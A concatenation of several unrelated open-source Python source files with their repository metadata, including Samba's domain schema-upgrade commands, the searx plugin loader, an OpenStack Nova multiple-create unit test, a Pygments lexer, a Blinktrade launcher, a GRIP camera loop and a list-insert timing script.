'systemauxiliaryclass']:
_, value = values
# The Microsoft updates contain some OIDs we don't recognize.
# Query the DB to see if we can work out the OID this update is
# referring to. If we find a match, then replace the OID with
# the ldapDisplayname
if '.' in value:
res = samdb.search(base=samdb.get_schema_basedn(),
expression="(|(attributeId=%s)(governsId=%s))" %
(value, value),
attrs=['ldapDisplayName'])
if len(res) != 1:
ldif_op.unknown_oid = value
else:
display_name = str(res[0]['ldapDisplayName'][0])
line = line.replace(value, ' ' + display_name)
# Microsoft has marked objects as defunct that Samba doesn't know about
if values[0].lower() == 'isdefunct' and values[1].strip().lower() == 'true':
ldif_op.is_defunct = True
# Samba has added the showInAdvancedViewOnly attribute to all objects,
# so rather than doing an add, we need to do a replace
if values[0].lower() == 'add' and values[1].strip().lower() == 'showinadvancedviewonly':
line = 'replace: showInAdvancedViewOnly'
# Add the line to the current LDIF operation (including the newline
# we stripped off at the start of the loop)
ldif_op.ldif += line + '\n'
return count
def _apply_update(self, samdb, update_file, base_dir):
"""Wrapper function for parsing an LDIF file and applying the updates"""
print("Applying %s updates..." % update_file)
ldif_file = None
try:
ldif_file = open(os.path.join(base_dir, update_file))
count = self._apply_updates_in_file(samdb, ldif_file)
finally:
if ldif_file:
ldif_file.close()
print("%u changes applied" % count)
return count
def run(self, **kwargs):
try:
from samba.ms_schema_markdown import read_ms_markdown
except ImportError as e:
self.outf.write("Exception in importing markdown: %s" % e)
raise CommandError('Failed to import module markdown')
from samba.schema import Schema
updates_allowed_overridden = False
sambaopts = kwargs.get("sambaopts")
credopts = kwargs.get("credopts")
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
H = kwargs.get("H")
target_schema = kwargs.get("schema")
ldf_files = kwargs.get("ldf_file")
base_dir = kwargs.get("base_dir")
temp_folder = None
samdb = SamDB(url=H, session_info=system_session(), credentials=creds, lp=lp)
# we're not going to get far if the config doesn't allow schema updates
if lp.get("dsdb:schema update allowed") is None:
lp.set("dsdb:schema update allowed", "yes")
print("Temporarily overriding 'dsdb:schema update allowed' setting")
updates_allowed_overridden = True
own_dn = ldb.Dn(samdb, samdb.get_dsServiceName())
master = get_fsmo_roleowner(samdb, str(samdb.get_schema_basedn()),
'schema')
if own_dn != master:
raise CommandError("This server is not the schema master.")
# if specific LDIF files were specified, just apply them
if ldf_files:
schema_updates = ldf_files.split(",")
else:
schema_updates = []
# work out the version of the target schema we're upgrading to
end = Schema.get_version(target_schema)
# work out the version of the schema we're currently using
res = samdb.search(base=samdb.get_schema_basedn(),
scope=ldb.SCOPE_BASE, attrs=['objectVersion'])
if len(res) != 1:
raise CommandError('Could not determine current schema version')
start = int(res[0]['objectVersion'][0]) + 1
diff_dir = setup_path("adprep/WindowsServerDocs")
if base_dir is None:
# Read from the Schema-Updates.md file
temp_folder = tempfile.mkdtemp()
update_file = setup_path("adprep/WindowsServerDocs/Schema-Updates.md")
try:
read_ms_markdown(update_file, temp_folder)
except Exception as e:
print("Exception in markdown parsing: %s" % e)
shutil.rmtree(temp_folder)
raise CommandError('Failed to upgrade schema')
base_dir = temp_folder
for version in range(start, end + 1):
update = 'Sch%d.ldf' % version
schema_updates.append(update)
# Apply patches if we parsed the Schema-Updates.md file
diff = os.path.abspath(os.path.join(diff_dir, update + '.diff'))
if temp_folder and os.path.exists(diff):
try:
p = subprocess.Popen(['patch', update, '-i', diff],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=temp_folder)
except (OSError, IOError):
shutil.rmtree(temp_folder)
raise CommandError("Failed to upgrade schema. Check if 'patch' is installed.")
stdout, stderr = p.communicate()
if p.returncode:
print("Exception in patch: %s\n%s" % (stdout, stderr))
shutil.rmtree(temp_folder)
raise CommandError('Failed to upgrade schema')
print("Patched %s using %s" % (update, diff))
if base_dir is None:
base_dir = setup_path("adprep")
samdb.transaction_start()
count = 0
error_encountered = False
try:
# Apply the schema updates needed to move to the new schema version
for ldif_file in schema_updates:
count += self._apply_update(samdb, ldif_file, base_dir)
if count > 0:
samdb.transaction_commit()
print("Schema successfully updated")
else:
print("No changes applied to schema")
samdb.transaction_cancel()
except Exception as e:
print("Exception: %s" % e)
print("Error encountered, aborting schema upgrade")
samdb.transaction_cancel()
error_encountered = True
if updates_allowed_overridden:
lp.set("dsdb:schema update allowed", "no")
if temp_folder:
shutil.rmtree(temp_folder)
if error_encountered:
raise CommandError('Failed to upgrade schema')
class cmd_domain_functional_prep(Command):
"""Domain functional level preparation"""
synopsis = "%prog [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
}
takes_options = [
Option("-H", "--URL", help="LDB URL for database or target server", type=str,
metavar="URL", dest="H"),
Option("-q", "--quiet", help="Be quiet", action="store_true"),
Option("-v", "--verbose", help="Be verbose", action="store_true"),
Option("--function-level", type="choice", metavar="FUNCTION_LEVEL",
choices=["2008_R2", "2012", "2012_R2"],
help="The schema file to upgrade to. Default is (Windows) 2012_R2.",
default="2012_R2"),
Option("--forest-prep", action="store_true",
help="Run the forest prep (by default, both the domain and forest prep are run)."),
Option("--domain-prep", action="store_true",
help="Run the domain prep (by default, both the domain and forest prep are run).")
]
def run(self, **kwargs):
updates_allowed_overridden = False
sambaopts = kwargs.get("sambaopts")
credopts = kwargs.get("credopts")
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
H = kwargs.get("H")
target_level = string_version_to_constant[kwargs.get("function_level")]
forest_prep = kwargs.get("forest_prep")
domain_prep = kwargs.get("domain_prep")
samdb = SamDB(url=H, session_info=system_session(), credentials=creds, lp=lp)
# we're not going to get far if the config doesn't allow schema updates
if lp.get("dsdb:schema update allowed") is None:
lp.set("dsdb:schema update allowed", "yes")
print("Temporarily overriding 'dsdb:schema update allowed' setting")
updates_allowed_overridden = True
if forest_prep is None and domain_prep is None:
forest_prep = True
domain_prep = True
own_dn = ldb.Dn(samdb, samdb.get_dsServiceName())
if forest_prep:
master = get_fsmo_roleowner(samdb, str(samdb.get_schema_basedn()),
'schema')
if own_dn != master:
raise CommandError("This server is not the schema master.")
if domain_prep:
domain_dn = samdb.domain_dn()
infrastructure_dn = "CN=Infrastructure," + domain_dn
master = get_fsmo_roleowner(samdb, infrastructure_dn,
'infrastructure')
if own_dn != master:
raise CommandError("This server is not the infrastructure master.")
if forest_prep:
samdb.transaction_start()
error_encountered = False
try:
from samba.forest_update import ForestUpdate
forest = ForestUpdate(samdb, fix=True)
forest.check_updates_iterator([53, 79, 80, 81, 82, 83])
forest.check_updates_functional_level(target_level,
DS_DOMAIN_FUNCTION_2008_R2,
update_revision=True)
samdb.transaction_commit()
except Exception as e:
print("Exception: %s" % e)
samdb.transaction_cancel()
error_encountered = True
if domain_prep:
samdb.transaction_start()
error_encountered = False
try:
from samba.domain_update import DomainUpdate
domain = DomainUpdate(samdb, fix=True)
domain.check_updates_functional_level(target_level,
DS_DOMAIN_FUNCTION_2008,
update_revision=True)
samdb.transaction_commit()
except Exception as e:
print("Exception: %s" % e)
samdb.transaction_cancel()
error_encountered = True
if updates_allowed_overridden:
lp.set("dsdb:schema update allowed", "no")
if error_encountered:
raise CommandError('Failed to perform functional prep')
class cmd_domain(SuperCommand):
"""Domain management."""
subcommands = {}
subcommands["demote"] = cmd_domain_demote()
if cmd_domain_export_keytab is not None:
subcommands["exportkeytab"] = cmd_domain_export_keytab()
subcommands["info"] = cmd_domain_info()
subcommands["provision"] = cmd_domain_provision()
subcommands["join"] = cmd_domain_join()
subcommands["dcpromo"] = cmd_domain_dcpromo()
subcommands["level"] = cmd_domain_level()
subcommands["passwordsettings"] = cmd_domain_passwordsettings()
subcommands["classicupgrade"] = cmd_domain_classicupgrade()
subcommands["samba3upgrade"] = cmd_domain_samba3upgrade()
subcommands["trust"] = cmd_domain_trust()
subcommands["tombstones"] = cmd_domain_tombstones()
subcommands["schemaupgrade"] = cmd_domain_schema_upgrade()
subcommands["functionalprep"] = cmd_domain_functional_prep()
subcommands["backup"] = cmd_domain_backup()
|
kernevil/samba
|
python/samba/netcmd/domain.py
|
Python
|
gpl-3.0
| 197,686
|
'''
searx is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
searx is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with searx. If not, see < http://www.gnu.org/licenses/ >.
(C) 2015 by Adam Tauber, <asciimoo@gmail.com>
'''
from sys import exit
from searx import logger
logger = logger.getChild('plugins')
from searx.plugins import (https_rewrite,
self_info,
search_on_category_select,
tracker_url_remover)
required_attrs = (('name', str),
('description', str),
('default_on', bool))
optional_attrs = (('js_dependencies', tuple),
('css_dependencies', tuple))
class Plugin():
default_on = False
name = 'Default plugin'
description = 'Default plugin description'
class PluginStore():
def __init__(self):
self.plugins = []
def __iter__(self):
for plugin in self.plugins:
yield plugin
def register(self, *plugins):
for plugin in plugins:
for plugin_attr, plugin_attr_type in required_attrs:
if not hasattr(plugin, plugin_attr) or not isinstance(getattr(plugin, plugin_attr), plugin_attr_type):
logger.critical('missing attribute "{0}", cannot load plugin: {1}'.format(plugin_attr, plugin))
exit(3)
for plugin_attr, plugin_attr_type in optional_attrs:
if not hasattr(plugin, plugin_attr) or not isinstance(getattr(plugin, plugin_attr), plugin_attr_type):
setattr(plugin, plugin_attr, plugin_attr_type())
plugin.id = plugin.name.replace(' ', '_')
self.plugins.append(plugin)
def call(self, plugin_type, request, *args, **kwargs):
ret = True
for plugin in request.user_plugins:
if hasattr(plugin, plugin_type):
ret = getattr(plugin, plugin_type)(request, *args, **kwargs)
if not ret:
break
return ret
plugins = PluginStore()
plugins.register(https_rewrite)
plugins.register(self_info)
plugins.register(search_on_category_select)
plugins.register(tracker_url_remover)
|
framasoft/searx
|
searx/plugins/__init__.py
|
Python
|
agpl-3.0
| 2,646
|
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import uuid
from oslo_config import cfg
import webob
from nova.api.openstack.compute import plugins
from nova.api.openstack.compute.plugins.v3 import block_device_mapping as \
block_device_mapping_v21
from nova.api.openstack.compute.plugins.v3 import multiple_create as \
multiple_create_v21
from nova.api.openstack.compute.plugins.v3 import servers as servers_v21
from nova.api.openstack.compute import servers as servers_v20
from nova.api.openstack import extensions as extensions_v20
from nova.compute import api as compute_api
from nova.compute import flavors
from nova import db
from nova import exception
from nova.network import manager
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_instance
from nova.tests.unit.image import fake
CONF = cfg.CONF
FAKE_UUID = fakes.FAKE_UUID
def fake_gen_uuid():
return FAKE_UUID
def return_security_group(context, instance_id, security_group_id):
pass
class MultiCreateExtensionTestV21(test.TestCase):
validation_error = exception.ValidationError
def setUp(self):
"""Shared implementation for tests below that create instance."""
super(MultiCreateExtensionTestV21, self).setUp()
self.flags(verbose=True,
enable_instance_password=True)
self.instance_cache_num = 0
self.instance_cache_by_id = {}
self.instance_cache_by_uuid = {}
ext_info = plugins.LoadedExtensionInfo()
self.controller = servers_v21.ServersController(
extension_info=ext_info)
CONF.set_override('extensions_blacklist', 'os-multiple-create',
'osapi_v3')
self.no_mult_create_controller = servers_v21.ServersController(
extension_info=ext_info)
def instance_create(context, inst):
inst_type = flavors.get_flavor_by_flavor_id(3)
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
def_image_ref = 'http://localhost/images/%s' % image_uuid
self.instance_cache_num += 1
instance = fake_instance.fake_db_instance(**{
'id': self.instance_cache_num,
'display_name': inst['display_name'] or 'test',
'uuid': FAKE_UUID,
'instance_type': inst_type,
'access_ip_v4': '1.2.3.4',
'access_ip_v6': 'fead::1234',
'image_ref': inst.get('image_ref', def_image_ref),
'user_id': 'fake',
'project_id': 'fake',
'reservation_id': inst['reservation_id'],
"created_at": datetime.datetime(2010, 10, 10, 12, 0, 0),
"updated_at": datetime.datetime(2010, 11, 11, 11, 0, 0),
"progress": 0,
"fixed_ips": [],
"task_state": "",
"vm_state": "",
"security_groups": inst['security_groups'],
})
self.instance_cache_by_id[instance['id']] = instance
self.instance_cache_by_uuid[instance['uuid']] = instance
return instance
def instance_get(context, instance_id):
"""Stub for compute/api create() pulling in instance after
scheduling
"""
return self.instance_cache_by_id[instance_id]
def instance_update(context, uuid, values):
instance = self.instance_cache_by_uuid[uuid]
instance.update(values)
return instance
def server_update(context, instance_uuid, params,
columns_to_join=None):
inst = self.instance_cache_by_uuid[instance_uuid]
inst.update(params)
return (inst, inst)
def fake_method(*args, **kwargs):
pass
def project_get_networks(context, user_id):
return dict(id='1', host='localhost')
fakes.stub_out_rate_limiting(self.stubs)
fakes.stub_out_key_pair_funcs(self.stubs)
fake.stub_out_image_service(self.stubs)
fakes.stub_out_nw_api(self.stubs)
self.stubs.Set(uuid, 'uuid4', fake_gen_uuid)
self.stubs.Set(db, 'instance_add_security_group',
return_security_group)
self.stubs.Set(db, 'project_get_networks',
project_get_networks)
self.stubs.Set(db, 'instance_create', instance_create)
self.stubs.Set(db, 'instance_system_metadata_update',
fake_method)
self.stubs.Set(db, 'instance_get', instance_get)
self.stubs.Set(db, 'instance_update', instance_update)
self.stubs.Set(db, 'instance_update_and_get_original',
server_update)
self.stubs.Set(manager.VlanManager, 'allocate_fixed_ip',
fake_method)
self.req = fakes.HTTPRequest.blank('')
def _test_create_extra(self, params, no_image=False,
override_controller=None):
image_uuid = 'c905cedb-7281-47e4-8a62-f26bc5fc4c77'
server = dict(name='server_test', imageRef=image_uuid, flavorRef=2)
if no_image:
server.pop('imageRef', None)
server.update(params)
body = dict(server=server)
if override_controller:
server = override_controller.create(self.req,
body=body).obj['server']
else:
server = self.controller.create(self.req,
body=body).obj['server']
def _check_multiple_create_extension_disabled(self, **kwargs):
# NOTE: on v2.1 API, "create a server" API doesn't add the following
# attributes into kwargs when non-loading multiple_create extension.
# However, v2.0 API adds them as values "1" instead. So we need to
# define checking methods for each API here.
self.assertNotIn('min_count', kwargs)
self.assertNotIn('max_count', kwargs)
def test_create_instance_with_multiple_create_disabled(self):
min_count = 2
max_count = 3
params = {
multiple_create_v21.MIN_ATTRIBUTE_NAME: min_count,
multiple_create_v21.MAX_ATTRIBUTE_NAME: max_count,
}
old_create = compute_api.API.create
def create(*args, **kwargs):
self._check_multiple_create_extension_disabled(**kwargs)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self._test_create_extra(
params,
override_controller=self.no_mult_create_controller)
def test_multiple_create_with_string_type_min_and_max(self):
min_count = '2'
max_count = '3'
params = {
multiple_create_v21.MIN_ATTRIBUTE_NAME: min_count,
multiple_create_v21.MAX_ATTRIBUTE_NAME: max_count,
}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertIsInstance(kwargs['min_count'], int)
self.assertIsInstance(kwargs['max_count'], int)
self.assertEqual(kwargs['min_count'], 2)
self.assertEqual(kwargs['max_count'], 3)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self._test_create_extra(params)
def test_create_instance_with_multiple_create_enabled(self):
min_count = 2
max_count = 3
params = {
multiple_create_v21.MIN_ATTRIBUTE_NAME: min_count,
multiple_create_v21.MAX_ATTRIBUTE_NAME: max_count,
}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['min_count'], 2)
self.assertEqual(kwargs['max_count'], 3)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self._test_create_extra(params)
def test_create_instance_invalid_negative_min(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: -1,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
}
}
self.assertRaises(self.validation_error,
self.controller.create,
self.req,
body=body)
def test_create_instance_invalid_negative_max(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MAX_ATTRIBUTE_NAME: -1,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
}
}
self.assertRaises(self.validation_error,
self.controller.create,
self.req,
body=body)
def test_create_instance_with_blank_min(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: '',
'name': 'server_test',
'image_ref': image_href,
'flavor_ref': flavor_ref,
}
}
self.assertRaises(self.validation_error,
self.controller.create,
self.req,
body=body)
def test_create_instance_with_blank_max(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MAX_ATTRIBUTE_NAME: '',
'name': 'server_test',
'image_ref': image_href,
'flavor_ref': flavor_ref,
}
}
self.assertRaises(self.validation_error,
self.controller.create,
self.req,
body=body)
def test_create_instance_invalid_min_greater_than_max(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: 4,
multiple_create_v21.MAX_ATTRIBUTE_NAME: 2,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
}
}
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create,
self.req,
body=body)
def test_create_instance_invalid_alpha_min(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: 'abcd',
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
}
}
self.assertRaises(self.validation_error,
self.controller.create,
self.req,
body=body)
def test_create_instance_invalid_alpha_max(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MAX_ATTRIBUTE_NAME: 'abcd',
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
}
}
self.assertRaises(self.validation_error,
self.controller.create,
self.req,
body=body)
def test_create_multiple_instances(self):
"""Test creating multiple instances but not asking for
reservation_id
"""
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: 2,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
'metadata': {'hello': 'world',
'open': 'stack'},
}
}
res = self.controller.create(self.req, body=body).obj
self.assertEqual(FAKE_UUID, res["server"]["id"])
self._check_admin_password_len(res["server"])
def test_create_multiple_instances_pass_disabled(self):
"""Test creating multiple instances but not asking for
reservation_id
"""
self.flags(enable_instance_password=False)
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: 2,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
'metadata': {'hello': 'world',
'open': 'stack'},
}
}
res = self.controller.create(self.req, body=body).obj
self.assertEqual(FAKE_UUID, res["server"]["id"])
self._check_admin_password_missing(res["server"])
def _check_admin_password_len(self, server_dict):
"""utility function - check server_dict for admin_password length."""
self.assertEqual(CONF.password_length,
len(server_dict["adminPass"]))
def _check_admin_password_missing(self, server_dict):
"""utility function - check server_dict for admin_password absence."""
self.assertNotIn("admin_password", server_dict)
def _create_multiple_instances_resv_id_return(self, resv_id_return):
"""Test creating multiple instances with asking for
reservation_id
"""
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: 2,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
'metadata': {'hello': 'world',
'open': 'stack'},
multiple_create_v21.RRID_ATTRIBUTE_NAME: resv_id_return
}
}
res = self.controller.create(self.req, body=body)
reservation_id = res.obj['reservation_id']
self.assertNotEqual(reservation_id, "")
self.assertIsNotNone(reservation_id)
self.assertTrue(len(reservation_id) > 1)
def test_create_multiple_instances_with_resv_id_return(self):
self._create_multiple_instances_resv_id_return(True)
def test_create_multiple_instances_with_string_resv_id_return(self):
self._create_multiple_instances_resv_id_return("True")
def test_create_multiple_instances_with_multiple_volume_bdm(self):
"""Test that a BadRequest is raised if multiple instances
are requested with a list of block device mappings for volumes.
"""
min_count = 2
bdm = [{'source_type': 'volume', 'uuid': 'vol-xxxx'},
{'source_type': 'volume', 'uuid': 'vol-yyyy'}
]
params = {
block_device_mapping_v21.ATTRIBUTE_NAME: bdm,
multiple_create_v21.MIN_ATTRIBUTE_NAME: min_count
}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['min_count'], 2)
self.assertEqual(len(kwargs['block_device_mapping']), 2)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
exc = self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params, no_image=True)
self.assertEqual("Cannot attach one or more volumes to multiple "
"instances", exc.explanation)
def test_create_multiple_instances_with_single_volume_bdm(self):
"""Test that a BadRequest is raised if multiple instances
are requested to boot from a single volume.
"""
min_count = 2
bdm = [{'source_type': 'volume', 'uuid': 'vol-xxxx'}]
params = {
block_device_mapping_v21.ATTRIBUTE_NAME: bdm,
multiple_create_v21.MIN_ATTRIBUTE_NAME: min_count
}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['min_count'], 2)
self.assertEqual(kwargs['block_device_mapping'][0]['volume_id'],
'vol-xxxx')
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
exc = self.assertRaises(webob.exc.HTTPBadRequest,
self._test_create_extra, params, no_image=True)
self.assertEqual("Cannot attach one or more volumes to multiple "
"instances", exc.explanation)
def test_create_multiple_instance_with_non_integer_max_count(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MAX_ATTRIBUTE_NAME: 2.5,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
'metadata': {'hello': 'world',
'open': 'stack'},
}
}
self.assertRaises(self.validation_error,
self.controller.create, self.req, body=body)
def test_create_multiple_instance_with_non_integer_min_count(self):
image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
flavor_ref = 'http://localhost/123/flavors/3'
body = {
'server': {
multiple_create_v21.MIN_ATTRIBUTE_NAME: 2.5,
'name': 'server_test',
'imageRef': image_href,
'flavorRef': flavor_ref,
'metadata': {'hello': 'world',
'open': 'stack'},
}
}
self.assertRaises(self.validation_error,
self.controller.create, self.req, body=body)
class MultiCreateExtensionTestV2(MultiCreateExtensionTestV21):
validation_error = webob.exc.HTTPBadRequest
def setUp(self):
"""Shared implementation for tests below that create instance."""
super(MultiCreateExtensionTestV2, self).setUp()
self.flags(verbose=True,
enable_instance_password=True)
self.instance_cache_num = 0
self.instance_cache_by_id = {}
self.instance_cache_by_uuid = {}
fakes.stub_out_nw_api(self.stubs)
self.ext_mgr = extensions_v20.ExtensionManager()
self.ext_mgr.extensions = {
'os-volumes': 'fake',
'os-multiple-create': 'fake',
'os-block-device-mapping-v2-boot': 'fake'
}
self.controller = servers_v20.Controller(self.ext_mgr)
no_mult_ext_mgr = extensions_v20.ExtensionManager()
no_mult_ext_mgr.extensions = {
'os-volumes': 'fake',
'os-block-device-mapping-v2-boot': 'fake'
}
self.no_mult_create_controller = servers_v20.Controller(
no_mult_ext_mgr)
def instance_create(context, inst):
inst_type = flavors.get_flavor_by_flavor_id(3)
image_uuid = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'
def_image_ref = 'http://localhost/images/%s' % image_uuid
self.instance_cache_num += 1
instance = fake_instance.fake_db_instance(**{
'id': self.instance_cache_num,
'display_name': inst['display_name'] or 'test',
'uuid': FAKE_UUID,
'instance_type': inst_type,
'access_ip_v4': '1.2.3.4',
'access_ip_v6': 'fead::1234',
'image_ref': inst.get('image_ref', def_image_ref),
'user_id': 'fake',
'project_id': 'fake',
'reservation_id': inst['reservation_id'],
"created_at": datetime.datetime(2010, 10, 10, 12, 0, 0),
"updated_at": datetime.datetime(2010, 11, 11, 11, 0, 0),
"config_drive": None,
"progress": 0,
"fixed_ips": [],
"task_state": "",
"vm_state": "",
"root_device_name": inst.get('root_device_name', 'vda'),
"security_groups": inst['security_groups'],
})
self.instance_cache_by_id[instance['id']] = instance
self.instance_cache_by_uuid[instance['uuid']] = instance
return instance
def instance_get(context, instance_id):
"""Stub for compute/api create() pulling in instance after
scheduling
"""
return self.instance_cache_by_id[instance_id]
fakes.stub_out_rate_limiting(self.stubs)
fakes.stub_out_key_pair_funcs(self.stubs)
fake.stub_out_image_service(self.stubs)
self.stubs.Set(uuid, 'uuid4', fake_gen_uuid)
self.stubs.Set(db, 'instance_create', instance_create)
self.stubs.Set(db, 'instance_get', instance_get)
def _check_multiple_create_extension_disabled(self, **kwargs):
self.assertEqual(kwargs['min_count'], 1)
self.assertEqual(kwargs['max_count'], 1)
|
jeffrey4l/nova
|
nova/tests/unit/api/openstack/compute/contrib/test_multiple_create.py
|
Python
|
apache-2.0
| 22,764
|
from pygments.lexer import RegexLexer, words
from pygments.token import *
KEYWORDS = [
'store', 'link', 'view', 'style',
'import', 'from',
'for', 'of', 'key',
'if', 'elif', 'else',
]
class KhufuLexer(RegexLexer):
name = 'Khufu'
aliases = ['khufu']
filenames = ['*.khufu']
tokens = {
'root': [
(words(KEYWORDS, suffix=r'\b'), Keyword),
(r'//.*\n', Comment),
(r'"[^"]*"', String),
(r'@[a-zA-Z_0-9]+', Name.Builtin),
(r'<[a-zA-Z_0-9]+', Name.Tag, 'tag'),
(r'.', Text),
],
'tag': [
(r'@[a-zA-Z_0-9]+', Name.Builtin),
(r'>', Name.Tag, '#pop'),
(r'.', Text),
],
}
|
tailhook/khufu
|
doc/khufulexer.py
|
Python
|
apache-2.0
| 738
|
#!/usr/bin/env python
import sys
import os
import ConfigParser
import json
import multiprocessing
from functools import partial
import time
import logging
import argparse
from appdirs import site_config_dir
from Queue import Queue
from threading import Thread
ROOT_PATH = os.path.abspath( os.path.join(os.path.dirname(__file__), "../"))
sys.path.insert( 0, os.path.join(ROOT_PATH, 'libs'))
sys.path.insert( 0, os.path.join(ROOT_PATH, 'apps'))
from pyblinktrade.project_options import ProjectOptions
def trade_instance(instance_name, project_options):
from trade.trade_application import TradeApplication
app = TradeApplication.instance()
app.initialize(project_options, instance_name)
app.run()
def ws_gateway_instance( instance_name , project_options):
from ws_gateway.main import run_application
run_application(project_options, instance_name)
def mailer_instance( instance_name , project_options):
from mailer.main import run_application
run_application(project_options,instance_name)
def main():
parser = argparse.ArgumentParser(description="Blinktrade")
parser.add_argument('-c',
"--config",
action="store",
dest="config",
help='Configuration file', type=str)
arguments = parser.parse_args()
candidates = [ os.path.join(site_config_dir('blinktrade'), 'bitex.ini'),
os.path.expanduser('~/.blinktrade/bitex.ini'),
arguments.config]
config = ConfigParser.SafeConfigParser()
config.read( candidates )
processes = []
for section_name in config.sections():
project_options = ProjectOptions(config, section_name)
if section_name[:5] == 'trade':
p = multiprocessing.Process(name=section_name, target=partial(trade_instance,section_name, project_options ) )
elif section_name[:10] == 'ws_gateway':
p = multiprocessing.Process(name=section_name, target=partial(ws_gateway_instance,section_name, project_options ) )
elif section_name[:6] == 'mailer':
p = multiprocessing.Process(name=section_name, target=partial(mailer_instance,section_name, project_options ) )
else:
raise RuntimeError("Invalid section name")
processes.append(p)
# start all sub processes
for p in processes:
p.daemon = True
p.start()
# wait for them to finish
for p in processes:
logging.debug('waiting %s', p.name )
p.join()
if __name__ == '__main__':
main()
|
coinjet/bitex
|
apps/main.py
|
Python
|
gpl-3.0
| 2,479
|
import inspect
from .cameraserver import CameraServer
def run(grip_pipeline):
'''
A function that can be used to run python image processing code
as generated by GRIP
'''
if inspect.isclass(grip_pipeline):
grip_pipeline = grip_pipeline()
cs = CameraServer.getInstance()
cs.enableLogging()
cs.startAutomaticCapture()
cvSink = cs.getVideo()
outputStream = None
img = None
while True:
time, img = cvSink.grabFrame(img)
if time == 0:
if outputStream:
outputStream.notifyError(cvSink.getError())
continue
# Process it with GRIP
out_img = grip_pipeline.process(img)
if out_img is not None:
try:
outputStream.putFrame(out_img)
except AttributeError:
if outputStream is None:
outputStream = cs.putVideo('GRIP', img.shape[1], img.shape[0])
else:
raise
|
Ironpulse/CRC2017
|
Cam/grip.py
|
Python
|
agpl-3.0
| 1,049
|
#!/usr/bin/python
from time import time
REPS = 17500
def insert():
m = [None]
i = 0
now = time()
while i < REPS:
m.insert(0, i)
i += 1
print 'Elapsed (insert):', time() - now
def colonZero():
m = [None]
i = 0
now = time()
while i < REPS:
m[:0] = [i]
i += 1
print 'Elapsed (colon-0):', time() - now
def main():
insert()
colonZero()
if __name__ == '__main__':
main()
